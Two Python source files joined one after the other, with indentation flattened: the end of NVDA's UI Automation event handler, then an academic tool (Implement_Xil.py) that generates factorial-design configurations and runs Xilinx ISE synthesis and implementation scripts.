pass
# Windows 10 RS5 provides new performance features for UI Automation including event coalescing and connection recovery.
# Enable all of these where available.
if isinstance(self.clientObject,IUIAutomation6):
self.clientObject.CoalesceEvents=CoalesceEventsOptions_Enabled
self.clientObject.ConnectionRecoveryBehavior=ConnectionRecoveryBehaviorOptions_Enabled
log.info("UIAutomation: %s"%self.clientObject.__class__.__mro__[1].__name__)
self.windowTreeWalker=self.clientObject.createTreeWalker(self.clientObject.CreateNotCondition(self.clientObject.CreatePropertyCondition(UIA_NativeWindowHandlePropertyId,0)))
self.windowCacheRequest=self.clientObject.CreateCacheRequest()
self.windowCacheRequest.AddProperty(UIA_NativeWindowHandlePropertyId)
self.UIAWindowHandleCache={}
self.baseTreeWalker=self.clientObject.RawViewWalker
self.baseCacheRequest=self.windowCacheRequest.Clone()
import UIAHandler
self.ItemIndex_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemIndex_Property_GUID),u"ItemIndex",1)
self.ItemCount_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemCount_Property_GUID),u"ItemCount",1)
for propertyId in (UIA_FrameworkIdPropertyId,UIA_AutomationIdPropertyId,UIA_ClassNamePropertyId,UIA_ControlTypePropertyId,UIA_ProviderDescriptionPropertyId,UIA_ProcessIdPropertyId,UIA_IsTextPatternAvailablePropertyId,UIA_IsContentElementPropertyId,UIA_IsControlElementPropertyId):
self.baseCacheRequest.addProperty(propertyId)
self.baseCacheRequest.addPattern(UIA_TextPatternId)
self.rootElement=self.clientObject.getRootElementBuildCache(self.baseCacheRequest)
self.reservedNotSupportedValue=self.clientObject.ReservedNotSupportedValue
self.ReservedMixedAttributeValue=self.clientObject.ReservedMixedAttributeValue
self.clientObject.AddFocusChangedEventHandler(self.baseCacheRequest,self)
self.clientObject.AddPropertyChangedEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self,UIAPropertyIdsToNVDAEventNames.keys())
for x in UIAEventIdsToNVDAEventNames.iterkeys():
self.clientObject.addAutomationEventHandler(x,self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
# #7984: add support for notification event (IUIAutomation5, part of Windows 10 build 16299 and later).
if isinstance(self.clientObject, IUIAutomation5):
self.clientObject.AddNotificationEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
except Exception as e:
self.MTAThreadInitException=e
finally:
self.MTAThreadInitEvent.set()
self.MTAThreadStopEvent.wait()
self.clientObject.RemoveAllEventHandlers()
def IUIAutomationEventHandler_HandleAutomationEvent(self,sender,eventID):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if eventID==UIA_MenuOpenedEventId and eventHandler.isPendingEvents("gainFocus"):
# We don't need the menuOpened event if focus has been fired,
# as focus should be more correct.
return
NVDAEventName=UIAEventIdsToNVDAEventNames.get(eventID,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if (
not obj
or (NVDAEventName=="gainFocus" and not obj.shouldAllowUIAFocusEvent)
or (NVDAEventName=="liveRegionChange" and not obj._shouldAllowUIALiveRegionChangeEvent)
):
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationFocusChangedEventHandler_HandleFocusChangedEvent(self,sender):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if not self.isNativeUIAElement(sender):
return
import NVDAObjects.UIA
if isinstance(eventHandler.lastQueuedFocusObject,NVDAObjects.UIA.UIA):
lastFocus=eventHandler.lastQueuedFocusObject.UIAElement
# Ignore duplicate focus events.
# It seems that it is possible for compareElements to return True, even though the objects are different.
# Therefore, don't ignore the event if the last focus object has lost its hasKeyboardFocus state.
if self.clientObject.compareElements(sender,lastFocus) and lastFocus.currentHasKeyboardFocus:
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent("gainFocus",windowHandle=window):
return
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj or not obj.shouldAllowUIAFocusEvent:
return
eventHandler.queueEvent("gainFocus",obj)
def IUIAutomationPropertyChangedEventHandler_HandlePropertyChangedEvent(self,sender,propertyId,newValue):
# #3867: For now manually force this VARIANT type to empty to get around a nasty double free in comtypes/ctypes.
# We also don't use the value in this callback.
newValue.vt=VT_EMPTY
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
NVDAEventName=UIAPropertyIdsToNVDAEventNames.get(propertyId,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationNotificationEventHandler_HandleNotificationEvent(self,sender,NotificationKind,NotificationProcessing,displayString,activityId):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
# Sometimes notification events can be fired on a UIAElement that has no windowHandle and does not connect through parents back to the desktop.
# There is nothing we can do with these.
return
eventHandler.queueEvent("UIA_notification",obj, notificationKind=NotificationKind, notificationProcessing=NotificationProcessing, displayString=displayString, activityId=activityId)
def _isUIAWindowHelper(self,hwnd):
# UIA in NVDA's process freezes in Windows 7 and below
processID=winUser.getWindowThreadProcessID(hwnd)[0]
if windll.kernel32.GetCurrentProcessId()==processID:
return False
import NVDAObjects.window
windowClass=NVDAObjects.window.Window.normalizeWindowClassName(winUser.getClassName(hwnd))
# For certain window classes, we always want to use UIA.
if windowClass in goodUIAWindowClassNames:
return True
# allow the appModule for the window to also choose if this window is good
# An appModule should be able to override bad UIA class names as prescribed by core
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
if appModule and appModule.isGoodUIAWindow(hwnd):
return True
# There are certain window classes that just had bad UIA implementations
if windowClass in badUIAWindowClassNames:
return False
if windowClass=="NetUIHWND":
parentHwnd=winUser.getAncestor(hwnd,winUser.GA_ROOT)
# #2816: Outlook 2010 auto complete does not fire enough UIA events, IAccessible is better.
# #4056: Combo boxes in Office 2010 Options dialogs don't expose a name via UIA, but do via MSAA.
if winUser.getClassName(parentHwnd) in {"Net UI Tool Window","NUIDialog"}:
return False
# allow the appModule for the window to also choose if this window is bad
if appModule and appModule.isBadUIAWindow(hwnd):
return False
# Ask the window if it supports UIA natively
res=windll.UIAutomationCore.UiaHasServerSideProvider(hwnd)
if res:
# the window does support UIA natively, but
# Microsoft Word should not use UIA unless we can't inject or the user explicitly chose to use UIA with Microsoft word
if windowClass=="_WwG" and not (config.conf['UIA']['useInMSWordWhenAvailable'] or not appModule.helperLocalBindingHandle):
return False
return bool(res)
def isUIAWindow(self,hwnd):
now=time.time()
v=self.UIAWindowHandleCache.get(hwnd,None)
if not v or (now-v[1])>0.5:
v=self._isUIAWindowHelper(hwnd),now
self.UIAWindowHandleCache[hwnd]=v
return v[0]
def getNearestWindowHandle(self,UIAElement):
if hasattr(UIAElement,"_nearestWindowHandle"):
# Called previously. Use cached result.
return UIAElement._nearestWindowHandle
try:
processID=UIAElement.cachedProcessID
except COMError:
return None
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
# WDAG (Windows Defender application Guard) UIA elements should be treated as being from a remote machine, and therefore their window handles are completely invalid on this machine.
# Therefore, jump all the way up to the root of the WDAG process and use that window handle as it is local to this machine.
if appModule.appName==WDAG_PROCESS_NAME:
condition=UIAUtils.createUIAMultiPropertyCondition({UIA_ClassNamePropertyId:[u'ApplicationFrameWindow',u'CabinetWClass']})
walker=self.clientObject.createTreeWalker(condition)
else:
# Not WDAG, just walk up to the nearest valid windowHandle
walker=self.windowTreeWalker
try:
new=walker.NormalizeElementBuildCache(UIAElement,self.windowCacheRequest)
except COMError:
return None
try:
window=new.cachedNativeWindowHandle
except COMError:
window=None
# Cache for future use to improve performance.
UIAElement._nearestWindowHandle=window
return window
def isNativeUIAElement(self,UIAElement):
#Due to issues dealing with UIA elements coming from the same process, we do not class these UIA elements as usable.
#It seems to be safe enough to retreave the cached processID, but using tree walkers or fetching other properties causes a freeze.
try:
processID=UIAElement.cachedProcessId
except COMError:
return False
if processID==windll.kernel32.GetCurrentProcessId():
return False
# Whether this is a native element depends on whether its window natively supports UIA.
windowHandle=self.getNearestWindowHandle(UIAElement)
if windowHandle:
if self.isUIAWindow(windowHandle):
return True
if winUser.getClassName(windowHandle)=="DirectUIHWND" and "IEFRAME.dll" in UIAElement.cachedProviderDescription and UIAElement.currentClassName in ("DownloadBox", "accessiblebutton", "DUIToolbarButton", "PushButton"):
# This is the IE 9 downloads list.
# #3354: UiaHasServerSideProvider returns false for the IE 9 downloads list window,
# so we'd normally use MSAA for this control.
# However, its MSAA implementation is broken (fires invalid events) if UIA is initialised,
# whereas its UIA implementation works correctly.
# Therefore, we must use UIA here.
return True
return False
|
Implement_Xil.py | # A tool implementing full/fractional factorial design for Xilinx ISE design Suite
# Launch format: python Implement_Xil.py config.xml
# where config.xml - custom configuration of DSE flow
# Author: Ilya Tuzov, Universitat Politecnica de Valencia
import sys
import xml.etree.ElementTree as ET
import re
import os
import datetime
import subprocess
import shutil
import string
import copy
import time
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import glob
from subprocess import call
from sys import platform
class Table:
def __init__(self, name):
self.name = name
self.columns = []
self.labels = []
def rownum(self):
if(len(self.columns) > 0):
return(len(self.columns[0]))
else:
return(0)
def colnum(self):
return(len(self.columns))
def add_column(self, lbl):
self.columns.append([])
self.labels.append(lbl)
def add_row(self, idata=None):
if(idata!=None):
if(len(idata) == self.colnum()):
for c in range(0, len(self.columns), 1):
self.columns[c].append(idata[c])
else:
print "Warning: Building Table - line size mismatch at add_row(): " + str(len(idata)) + " <> " + str(self.colnum())
else:
for c in self.columns:
c.append("")
def put(self, row, col, data):
if( col < len(self.columns) ):
if( row < len(self.columns[0]) ):
self.columns[col][row] = data
else:
print("Table: "+self.name + " : put data: " + str(data) + " : Row index " + str(row) + " not defined")
else:
print("Table: "+self.name + " : put data: " + str(data) + " : Column index " + str(col) + " not defined")
def get(self, row, col):
if( col < len(self.columns) ):
if( row < len(self.columns[col]) ):
return(self.columns[col][row])
else:
print("Table: "+self.name + " : put data: " + str(data) + " : Row index " + str(row) + " not defined")
else:
print("Table: "+self.name + " : put data: " + str(data) + " : Column index " + str(col) + " not defined")
return("")
def to_csv(self):
res = "sep=;\n"
for l in self.labels:
res += l+";"
nc = len(self.columns)
nr = len(self.columns[0])
for r in range(0, nr, 1):
res+="\n"
for c in range(0, nc, 1):
res+=str(self.get(r,c))+";"
return(res)
def to_xml(self, tagname = 'Item'):
res = "<?xml version=\"1.0\"?>\n<data>\n"
for r in range(0, self.rownum(), 1):
res += '\n\n<' + tagname
for c in range(0, self.colnum(), 1):
res += '\n\t' + self.labels[c] + '=\"' + self.get(r, c) + '\"'
res += '/>'
res += "\n</data>"
return(res)
def snormalize(self, ist):
if(ist[-1]=="\r" or ist[-1]=="\n"):
del ist[-1]
return ist
def build_from_csv(self, fname):
fdesc = open(fname, 'r')
content = fdesc.read()
fdesc.close()
lines = string.split(content,'\n')
itemsep = re.findall("sep\s*?=\s*?([;,]+)", lines[0])[0]
labels = self.snormalize(lines[1].rstrip(itemsep).split(itemsep))
for l in labels:
self.add_column(l)
for i in range(2, len(lines), 1):
c = self.snormalize(lines[i].rstrip(itemsep).split(itemsep))
self.add_row(c)
#------------------------------------------------------------------------------------
class IOption:
def __init__(self, name, value = ""):
self.name = name #power, opt_mode....
self.value = value #No/Yes, Speed/Area...
class IFactor:
def __init__(self, ifactor_name, ioption_name="", iphase = ""):
self.factor_name = ifactor_name #X1....X31
self.option_name = ioption_name #power, opt_mode
self.phase = iphase #synthesis/translate/map/par
self.option_values = dict() #option_value[X.value]=Speed
def add_setting(self, ifactor_value, ioption_value):
self.option_values[ifactor_value] = ioption_value
def to_string(self):
res = "Factor: " + self.factor_name + "\tOption: " + self.option_name + "\tPhase: " + self.phase
for k, v in self.option_values.items():
res += "\n\t"+str(k) + " : " + str(v)
return(res)
class IFactorialConfiguration:
def __init__(self, ilabel):
self.label = ilabel
self.synthesis = [] #Ioption
self.translate = []
self.map = []
self.par = []
self.genconf = None
#-------------------
self.factor_setting = []
self.table_index = int(-1)
self.synthesis_log = None
self.translate_log = None
self.map_log = None
self.par_log = None
self.synthesis_netlist_log = None
self.map_netlist_log = None
self.par_netlist_log = None
self.trace_report = None
self.es_power_report = None
self.saif_power_report = None
def to_string(self):
res = "Options Confugiration: " + self.label
res += "\n\tSynthesis:"
for c in self.synthesis:
res += "\n\t\t"+ c.name + " = " + c.value
res += "\n\tTranslate:"
for c in self.translate:
res += "\n\t\t"+ c.name + " = " + c.value
res += "\n\tMAP:"
for c in self.map:
res += "\n\t\t"+ c.name + " = " + c.value
res += "\n\tPAR:"
for c in self.par:
res += "\n\t\t"+ c.name + " = " + c.value
return(res)
def mcopy(self, ilabel):
res = IFactorialConfiguration(ilabel)
res.synthesis = copy.deepcopy(self.synthesis)
res.translate = copy.deepcopy(self.translate)
res.map = copy.deepcopy(self.map)
res.par = copy.deepcopy(self.par)
res.genconf = self.genconf
res.build_log_desc()
return(res)
def build_log_desc(self):
self.synthesis_log = self.genconf.log_dir + "/_synthesis.log"
self.translate_log = self.genconf.log_dir + "/_translate.log"
self.map_log = self.genconf.log_dir + "/_map.log"
self.par_log = self.genconf.log_dir + "/_par.log"
self.synthesis_netlist_log = self.genconf.log_dir + "/_post_synt_netlist.log"
self.map_netlist_log = self.genconf.log_dir + "/_map_netlist_log.log"
self.par_netlist_log = self.genconf.log_dir + "/_par_netlist_log.log"
self.fuse_log = self.genconf.log_dir + "/" + "fuse_log.log"
self.isim_log = self.genconf.log_dir + "/" + "isim_log.log"
self.trace_report = self.genconf.log_dir + "/" + "timing.twr"
self.es_power_report = self.genconf.log_dir + "/estimated_power_" + self.genconf.top_design_unit + ".pwr"
self.saif_power_report = self.genconf.log_dir + "/SAIF_" + self.genconf.top_design_unit + ".pwr"
def get_option_by_name(self, iname, iphase):
if(iphase == "synthesis"):
for c in self.synthesis:
if(c.name == iname):
return(c)
elif(iphase == "translate"):
for c in self.translate:
if(c.name == iname):
return(c)
elif(iphase == "map"):
for c in self.map:
if(c.name == iname):
return(c)
elif(iphase == "par"):
for c in self.par:
if(c.name == iname):
return(c)
else:
print "Error: get_option_by_name: \"" + iphase +"\" phase not found"
sys.exit(0)
return(None)
def get_xst_file_name(self):
return(self.genconf.top_design_unit + ".xst")
def get_xst_file_content(self):
res = "\nrun"
for c in self.synthesis:
res += "\n-"+c.name + " " + c.value
return(res + "\n")
def get_synthesis_script(self):
#self.synthesis_log = self.genconf.log_dir + "/_synthesis.log"
res = "xst -intstyle " + self.genconf.intstyle + " -ifn \"./" + self.get_xst_file_name() + "\" -ofn \"" +self.genconf.log_dir + "/"+self.genconf.top_design_unit+".syr\" > " + self.synthesis_log
return(res)
def get_translate_script(self):
#self.translate_log = self.genconf.log_dir + "/_translate.log"
res = "ngdbuild "
for c in self.translate:
if(c.value.find('!-') < 0):
if(c.name.replace(' ', '').replace('\t','') != ""):
res += " -" + c.name
if(c.value.find('!+') < 0): res += " " + c.value
else:
res += " " + c.value
res += " > " + self.translate_log
return(res)
def get_map_script(self):
#self.map_log = self.genconf.log_dir + "/_map.log"
res = "map "
for c in self.map:
if(c.value.find('!-') < 0):
if (c.name.replace(' ', '').replace('\t','') != ""):
res += " -" + c.name
if(c.value.find('!+') < 0): res += " " + c.value
else:
res += " " + c.value
res += " > " + self.map_log
return(res)
def get_par_script(self):
#self.par_log = self.genconf.log_dir + "/_par.log"
if self.genconf.ise_path != "":
res = os.path.join(self.genconf.ise_path, 'ISE/bin/nt64/par.exe' ) + " -w "
else:
res = "par -w "
for c in self.par:
if(c.value.find('!-') < 0):
if(c.name.replace(' ', '').replace('\t','') != ""):
res += " -" + c.name
if(c.value.find('!+') < 0): res += " " + c.value
else:
res += " " + c.value
res += " > " + self.par_log
return(res)
#phase = synthesis / map / par
def get_netgen_script(self, phase):
res = "netgen -intstyle " + self.genconf.intstyle + " " + self.genconf.basic_netgen_options
if(phase == "synthesis"):
res += "-dir " + self.genconf.netlist_dir + "/synthesis " + "-sim " + self.genconf.top_design_unit + ".ngc " + "_synthesis.vhd > " + self.synthesis_netlist_log
# res += "-dir " + self.genconf.netlist_dir + "/synthesis " + "-sim " + self.genconf.top_design_unit + ".ngc " + "_synthesis.v > " + self.synthesis_netlist_log
elif(phase == "map"):
res += "-dir " + self.genconf.netlist_dir + "/map " + "-pcf " + self.genconf.top_design_unit + ".pcf " + "-sim " + self.genconf.top_design_unit + "_map.ncd " + "_map.vhd > " + self.map_netlist_log
# res += "-dir " + self.genconf.netlist_dir + "/map " + "-pcf " + self.genconf.top_design_unit + ".pcf " + "-sim " + self.genconf.top_design_unit + "_map.ncd " + "_map.v > " + self.map_netlist_log
elif(phase == "par"):
res += "-dir " + self.genconf.netlist_dir + "/par " + "-pcf " + self.genconf.top_design_unit + ".pcf" + " -tb" + " -insert_pp_buffers true " + "-sim " + self.genconf.top_design_unit + ".ncd " + "_timesim.vhd > " + self.par_netlist_log
# res += "-dir " + self.genconf.netlist_dir + "/par " + "-pcf " + self.genconf.top_design_unit + ".pcf" + " -tb" + " -insert_pp_buffers true " + "-sim " + self.genconf.top_design_unit + ".ncd " + "_timesim.v > " + self.par_netlist_log
else:
print "get_netgen_script: undefined phase " + phase
return(res)
def get_trace_script(self):
res = "trce -intstyle " + self.genconf.intstyle + " -v 3 -n 3 -s " + self.genconf.speed_grade + " -fastpaths -xml " + self.genconf.top_design_unit + ".twx " + self.genconf.top_design_unit + ".ncd -o " + self.trace_report + " " + self.genconf.top_design_unit + ".pcf" + " -ucf " + self.genconf.constraint_file + " > " + self.genconf.log_dir + "/trace.log"
return(res)
def get_es_power_script(self):
res = "xpwr -intstyle " + self.genconf.intstyle + " " + self.genconf.top_design_unit + ".ncd " + self.genconf.top_design_unit + ".pcf" + " -o " + self.es_power_report + " > " + self.genconf.log_dir + "/xpower_log.log"
return(res)
class IFactorialDesign:
def __init__(self):
self.configurations = [] #IFactorialConfiguration
def append_configuration(self, config):
self.configurations.append(config)
def get_by_label(self, label):
for c in self.configurations:
if c.label == label:
return(c)
return(None)
def to_string(self):
res = "\n\t\t\tCONFIGURATIONS"
for c in self.configurations:
res += "\n\n\n\tLABEL: " + c.label
res += "\n" + c.get_xst_file_content()
res += "\nSynthesis_script: " + c.get_synthesis_script()
res += "\nTranslate_script: " + c.get_translate_script()
res += "\nMap_script: " + c.get_map_script()
res += "\nPar_script: " + c.get_par_script()
res += "\nNetgen_Synt_script: " + c.get_netgen_script("synthesis")
res += "\nNetgen_Map_script: " + c.get_netgen_script("map")
res += "\nNetgen_Par_script: " + c.get_netgen_script("par")
res += "\nTrace_script: " + c.get_trace_script()
return(res)
class GenericConfig:
def __init__(self, itag=None):
self.ise_path = ""
self.device = ""
self.speed_grade = ""
self.top_design_unit = ""
self.intstyle = ""
self.ifn = ""
self.constraint_file = ""
self.clk_net = ""
self.rst_net = ""
self.clk_initial_period = 0.0
self.clk_adjustment_delta = 0.0
self.design_label = ""
self.relative_path = ""
self.design_dir = ""
self.template_dir = ""
self.log_dir = ""
self.netlist_dir = ""
self.basic_netgen_options = ""
self.rpw_tpw = ""
self.generic_constraint_file = ""
self.generic_constraint_content = ""
self.tool_log_dir = ""
self.testbench_template_file = ""
self.sim_project_file = ""
self.testbench_file = ""
self.testbench_top_unit = ""
self.clk_constant = ""
self.uut_root = ""
self.std_start_time = float(0.0)
self.std_observation_time = float(0.0)
self.std_clock_period = float(0.0)
self.isim_gui = ""
self.waveform_file = ""
self.statfile = "XIStat.xml"
if(itag!=None):
self.build_from_xml(itag)
def build_from_xml(self, itag):
self.ise_path = itag.get('ise_path')
self.device = itag.get('device')
self.speed_grade = itag.get('speed_grade')
self.top_design_unit = itag.get('top_design_unit')
self.intstyle = itag.get('intstyle')
self.ifn = itag.get('ifn')
self.constraint_file = self.top_design_unit + ".ucf"
self.clk_net = itag.get('clk_net')
self.rst_net = itag.get('rst_net')
self.clk_initial_period = float(itag.get('clk_initial_period'))
self.clk_adjustment_delta = float(itag.get('clk_adjustment_delta'))
self.design_label = itag.get('design_label')
self.relative_path = itag.get('relative_path')
self.design_dir = itag.get('design_dir')
self.template_dir = itag.get('template_dir')
self.log_dir = itag.get('log_dir')
self.netlist_dir = itag.get('netlist_dir')
self.basic_netgen_options = itag.get('basic_netgen_options')
self.rpw_tpw = itag.get('rpw_tpw')
self.generic_constraint_file = itag.get('generic_constraint_file')
self.testbench_template_file = itag.get('testbench_template_file')
self.sim_project_file = itag.get('sim_project_file')
self.testbench_file = itag.get('testbench_file')
self.testbench_top_unit = itag.get('testbench_top_unit')
self.clk_constant = itag.get('clk_constant')
self.uut_root = itag.get('uut_root')
self.std_start_time = float(itag.get('std_start_time'))
self.std_observation_time = float(itag.get('std_observation_time'))
self.std_clock_period = float(itag.get('std_clock_period'))
self.isim_gui = itag.get('isim_gui')
self.waveform_file = itag.get('waveform_file')
def to_string(self):
res = "Generic Configuration: "
res += "\n\tise_path: " + self.ise_path
res += "\n\tdevice: " + self.device
res += "\n\tspeed_grade: " + self.speed_grade
res += "\n\ttop_design_unit: " + self.top_design_unit
res += "\n\tintstyle: " + self.intstyle
res += "\n\tifn: " + self.ifn
res += "\n\tconstraint_file: " + self.constraint_file
res += "\n\tclk_net: " + self.clk_net
res += "\n\trst_net: " + self.rst_net
res += "\n\tclk_initial_period: " + str(self.clk_initial_period)
res += "\n\tclk_adjustment_delta: " + str(self.clk_adjustment_delta)
res += "\n\tdesign_label: " + self.design_label
res += "\n\trelative_path: " + self.relative_path
res += "\n\tdesign_dir: " + self.design_dir
res += "\n\ttemplate_dir: " + self.template_dir
res += "\n\tlog_dir: " + self.log_dir
res += "\n\tnetlist_dir: " + self.netlist_dir
res += "\n\tbasic_netgen_options: " + self.basic_netgen_options
res += "\n\trpw_tpw: " + self.rpw_tpw
res += "\n\tgeneric_constraint_file: " + self.generic_constraint_file
res += "\n\ttestbench_template_file: " + self.testbench_template_file
res += "\n\tsim_project_file: " + self.sim_project_file
res += "\n\tgeneric_constraint_file: " + self.generic_constraint_file
res += "\n\ttestbench_top_unit: " + self.testbench_top_unit
res += "\n\tclk_constant: " + self.clk_constant
res += "\n\tuut_root: " + self.uut_root
res += "\n\tstd_start_time: " + str(self.std_start_time)
res += "\n\tstd_observation_time: " + str(self.std_observation_time)
res += "\n\tstd_clock_period: " + str(self.std_clock_period)
res += "\nisim_gui: " +str(self.isim_gui)
res += "\nwaveform_file: " +str(self.waveform_file)
return(res)
class IoptionConfigurator:
def __init__(self):
self.config_table = None #Table
self.factors = [] #IFactor
self.res_design = None
self.genconf = None
def get_factor_by_name(self, fc_name):
for c in self.factors:
if(c.factor_name == fc_name):
return(c)
return(None)
def create_design(self, croot):
self.genconf = GenericConfig(croot.findall('generic')[0])
print self.genconf.to_string()
if(self.genconf.generic_constraint_file != ""):
f = open(os.path.join(self.genconf.design_dir, self.genconf.template_dir, self.genconf.generic_constraint_file), 'r')
self.genconf.generic_constraint_content = f.read()
f.close()
print "Generic Constraints: " + self.genconf.generic_constraint_content
self.genconf.tool_log_dir = os.path.join(os.getcwd(), self.genconf.design_dir, "Logs")
self.genconf.statfile = os.path.join(os.getcwd(), self.genconf.design_dir, self.genconf.statfile)
if(not os.path.exists(self.genconf.tool_log_dir)):
os.mkdir(self.genconf.tool_log_dir)
mlog = open(os.path.join(self.genconf.tool_log_dir, "_Configurations.log"),'w')
#read the defaults
default_configuration = IFactorialConfiguration(self.genconf.design_label+"Default")
default_configuration.genconf = self.genconf
o_synthesis = croot.findall('default_synthesis_options')[0].findall('option')
o_translate = croot.findall('default_translate_options')[0].findall('option')
o_map = croot.findall('default_map_options')[0].findall('option')
o_par = croot.findall('default_par_options')[0].findall('option')
for opt in o_synthesis:
default_configuration.synthesis.append(IOption(opt.get('name'), opt.get('value')))
for opt in o_translate:
default_configuration.translate.append(IOption(opt.get('name'), opt.get('value')))
for opt in o_map:
default_configuration.map.append(IOption(opt.get('name'), opt.get('value')))
for opt in o_par:
default_configuration.par.append(IOption(opt.get('name'), opt.get('value')))
o_device = IOption('p', self.genconf.device)
default_configuration.synthesis.append(o_device)
default_configuration.synthesis.append(IOption('ifn', self.genconf.ifn))
default_configuration.synthesis.append(IOption('ofn', self.genconf.top_design_unit))
default_configuration.synthesis.append(IOption('top', self.genconf.top_design_unit))
default_configuration.translate.insert(0,IOption('intstyle', self.genconf.intstyle))
default_configuration.translate.append(IOption('uc', self.genconf.constraint_file))
default_configuration.translate.append(o_device)
default_configuration.translate.append(IOption(' ', self.genconf.top_design_unit + ".ngc " + self.genconf.top_design_unit + ".ngd"))
default_configuration.map.insert(0,IOption('intstyle', self.genconf.intstyle))
default_configuration.map.append(o_device)
default_configuration.map.append(IOption('o', self.genconf.top_design_unit + "_map.ncd " + self.genconf.top_design_unit + ".ngd " + self.genconf.top_design_unit + ".pcf"))
default_configuration.par.insert(0,IOption('intstyle', self.genconf.intstyle))
default_configuration.par.append(IOption(' ', self.genconf.top_design_unit + "_map.ncd " + self.genconf.top_design_unit + ".ncd " + self.genconf.top_design_unit + ".pcf"))
default_configuration.build_log_desc()
print default_configuration.to_string()
factor_setting = croot.findall('factorial_design')[0]
#read the Table of factors setting
self.config_table = Table("Partial Factorial Design/Configurations")
self.config_table.build_from_csv(factor_setting.get('table_of_factors'))
print self.config_table.to_csv()
#read factors assignment
fset = factor_setting.findall('factor')
for tag in fset:
fc = IFactor(tag.get('name'), tag.get('option'), tag.get('phase'))
set_tag = tag.findall('setting')
for x in set_tag:
fc.add_setting(x.get('factor_value'), x.get('option_value'))
self.factors.append(fc)
for i in self.factors:
print i.to_string()
#Build configurations
self.res_design = IFactorialDesign()
self.res_design.append_configuration(default_configuration)
for i in range(0, self.config_table.rownum(), 1):
conf = default_configuration.mcopy(self.genconf.design_label + str("%03d" % i))
conf.table_index = i
conf.factor_setting = []
for c in range(0, self.config_table.colnum(), 1):
x_name = self.config_table.labels[c]
x_value = self.config_table.get(i, c)
x_factor = self.get_factor_by_name(x_name)
conf.factor_setting.append(x_value)
if(x_factor == None):
print "Error: not found in the configuration file *.xml: Factor " + x_name
sys.exit(0)
x_option = conf.get_option_by_name(x_factor.option_name, x_factor.phase)
x_option.value = x_factor.option_values[x_value]
self.res_design.append_configuration(conf)
mlog.write(self.res_design.to_string())
mlog.close()
return(self.res_design)
def execute_impl_script(script, res_logfile, retry_attempts, comment, ilog, check_file = ""):
attempt = 0
res_ok = 0
cfile_ok = 1
timestart = datetime.datetime.now().replace(microsecond=0)
while(((res_ok==0) or (cfile_ok==0)) and (attempt <= retry_attempts)):
ilog.write("\n" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + "\tStarting: " + comment + ", attempt " + str(attempt) +" : {"+ script+"}")
ilog.flush()
proc = subprocess.Popen(script, shell=True)
proc.wait()
if os.path.exists(res_logfile):
with open(res_logfile, 'r') as f:
content = f.read()
else:
ilog.write("\n"+ datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+ "\tResult file not found: "+res_logfile)
return(-1, str(datetime.datetime.now().replace(microsecond=0) - timestart))
cfile_ok = 1
if(check_file != ""):
if(not os.path.isfile(check_file)):
ilog.write("\n"+ check_file + " Not found after " + comment)
cfile_ok = 0
if((content.find('ERROR:') >= 0) or (cfile_ok == 0)):
attempt += 1
ilog.write("\n" + comment +": Error reported, retrying...")
else:
res_ok = 1
cfile_ok = 1
if(res_ok == 0):
ilog.write("\n"+comment+" Unsuccessfull")
ilog.flush
return(-1, str(datetime.datetime.now().replace(microsecond=0) - timestart))
else:
ilog.write("\n"+comment + " Finished Successfully")
return(1, str(datetime.datetime.now().replace(microsecond=0) - timestart))
def implement_configuration(config, target_dir, retry_attempts, overwrite_flag, stat):
print "STARTED : " + config.label
log = open(os.path.join(config.genconf.tool_log_dir, config.label+".log"), 'w')
log.write("\n\t\tImplementing: " + config.label+"\n")
#create directories
if os.path.exists(config.label):
if not overwrite_flag: return
else:
shutil.rmtree(config.label)
shutil.copytree(config.genconf.template_dir, config.label)
os.chdir(os.path.join(target_dir, config.label))
print "Process [" + config.label + "], working dir: " + os.getcwd()
if(not os.path.exists(config.genconf.log_dir)):
os.makedirs(config.genconf.log_dir)
#create *.xst file (synthesis options)
f = open(config.get_xst_file_name(), "w")
f.write(config.get_xst_file_content())
f.close()
#1.1 Synthesis
stat.update('Progress', 'Synthesis$wait')
stat.update('Synthesis', 'In progress$wait')
(status, timetaken) = execute_impl_script(config.get_synthesis_script(), config.synthesis_log, retry_attempts, "SYNTHESIS", log, os.path.join(target_dir, config.label, config.genconf.top_design_unit + ".ngc"))
if(status < 0):
stat.update('Synthesis', 'Error$err')
return(status)
stat.update('Synthesis', 'Building Post-Synt netlist$wait')
(status, timetaken) = execute_impl_script(config.get_netgen_script('synthesis'), config.synthesis_netlist_log, retry_attempts, "Building Netlist", log)
if(status < 0):
stat.update('Synthesis', 'Error$err')
return(status)
#check .ngc file
stat.update('Synthesis', '100%: ' + timetaken + '$ok')
#2. Implementation
iteration = 0
finish = 0
